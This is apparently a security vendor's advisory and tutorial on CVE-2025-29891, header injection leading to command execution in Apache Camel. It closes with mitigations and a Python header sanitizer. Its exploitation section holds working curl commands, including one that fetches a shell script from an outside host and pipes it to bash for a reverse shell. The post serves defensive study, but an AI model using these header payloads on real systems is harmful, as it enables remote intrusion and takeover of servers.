CVE-2025-29891 – Apache Camel Exploit via CAmelExecCommandArgs Header Injection

Research & Tutorials

Aug 8, 2025

Discover how CVE-2025-29891 impacts Apache Camel via CAmelExecCommandArgs header injection. Learn how attackers exploit this misconfiguration for remote code execution and how to secure your systems.

OffSec Team


Overview

CVE-2025-29891 is a remote command injection vulnerability found in Apache Camel’s HTTP endpoints when misconfigured. The flaw arises from insecure usage of the CAmelExecCommandExecutable and CAmelExecCommandArgs headers, which can be exploited to execute arbitrary commands. It affects systems where the attacker can interact with HTTP-exposed Camel routes, particularly if security hardening is weak or missing. A similar vulnerability was previously detailed by OffSec in our blog post on CVE-2025-27636.

  • CVE ID: CVE-2025-29891
  • Severity: Medium
  • CVSS Score: 4.8
  • EPSS Score: 0.24%
  • Impact: Remote Code Execution
  • Attack Vector: Network
  • Authentication Required: No
  • Vulnerable Component: camel-exec route in Apache Camel

Technical Breakdown

Apache Camel lets message headers control how a route's components behave. With the camel-exec component, this means the system command to run can be supplied through HTTP requests that set:

  • CAmelExecCommandExecutable – the binary to run (e.g., curl, bash)
  • CAmelExecCommandArgs – arguments passed to the binary

If the system exposes HTTP endpoints with the camel-exec component and does not filter or validate these headers, an attacker can leverage them to execute arbitrary commands on the host system.


Conditions for Exploitation

  • The Apache Camel instance must expose an HTTP endpoint utilizing camel-exec.
  • The attacker must be able to send crafted HTTP requests to the endpoint.
  • Headers CAmelExecCommandExecutable and CAmelExecCommandArgs must not be filtered or sanitized.

Exploitation

A route misconfiguration exposing this logic over HTTP can be weaponized to issue commands remotely. This behavior becomes critical when paired with web-accessible endpoints such as /api/system-version.

For example, a simple sleep command:

curl --header "CAmelExecCommandExecutable: sleep" \
     --header "CAmelExecCommandArgs: 5" \
     http://192.168.56.80:8080/api/system-version

Or for full remote command execution with a reverse shell:

curl --header "CAmelExecCommandExecutable: curl" \
     --header "CAmelExecCommandArgs: 192.168.18.5:3333/rev.sh -o /tmp/rev.sh | bash /tmp/rev.sh" \
     http://192.168.56.80:8080/api/system-version

The headers are interpreted and executed directly on the host, enabling full shell access if the server allows outbound connections.

Try Hands-On
You can try exploiting this vulnerability in a controlled environment via the OffSec lab for CVE-2025-29891.

Mitigation

  • Do not expose camel-exec routes over publicly accessible endpoints.
  • Validate and sanitize headers and inputs before invoking command execution.
  • Use proper authentication and authorization around sensitive routes.
  • Consider disabling or removing the camel-exec component unless absolutely required.
  • Upgrade Apache Camel to a patched version if one is released for this CVE.
  • Restrict outbound access from the server to prevent reverse shells or external payload fetching.
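
The header validation step above can be sketched as follows. This is an added example, not OffSec's or Apache Camel's code: it parses a constructed request that mirrors the sleep test on this page and drops reserved headers using a case-insensitive match. The prefix list, the function names and the exact-case `naive_is_reserved` shown for contrast are assumptions of the example.

```python
# Assumption of this example: inbound headers whose names start with these
# prefixes are internal to Camel and are never legitimately sent by a client.
RESERVED_PREFIXES = ("camel", "org.apache.camel.")


def parse_request(raw):
    """Split a raw HTTP/1.1 request head into (request_line, [(name, value)])."""
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    lines = head.split("\n")
    headers = []
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:  # skip malformed lines that have no colon
            headers.append((name.strip(), value.strip()))
    return lines[0], headers


def naive_is_reserved(name):
    # Hypothetical exact-case check, shown only for contrast: it misses "CAmel...".
    return name.startswith(("Camel", "camel"))


def is_reserved(name):
    # HTTP header names are case-insensitive, so normalise before matching;
    # this catches the page's "CAmelExec..." spelling and any other casing.
    return name.lower().startswith(RESERVED_PREFIXES)


def sanitize(headers):
    """Return (kept, dropped): headers safe to forward and headers to log."""
    kept = [(n, v) for n, v in headers if not is_reserved(n)]
    dropped = [(n, v) for n, v in headers if is_reserved(n)]
    return kept, dropped


# Constructed sample request mirroring the sleep test shown on this page.
SAMPLE = (
    "GET /api/system-version HTTP/1.1\r\n"
    "Host: 192.168.56.80:8080\r\n"
    "User-Agent: curl/8.5.0\r\n"
    "CAmelExecCommandExecutable: sleep\r\n"
    "CAmelExecCommandArgs: 5\r\n"
    "\r\n"
)

if __name__ == "__main__":
    request_line, headers = parse_request(SAMPLE)
    kept, dropped = sanitize(headers)
    for name, value in dropped:
        print(f"ALERT {request_line!r}: reserved header {name}={value!r}")
    print("forwarded:", [n for n, _ in kept])
```

The same case-insensitive match can be applied to proxy or WAF logs to find requests that already carried these headers.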
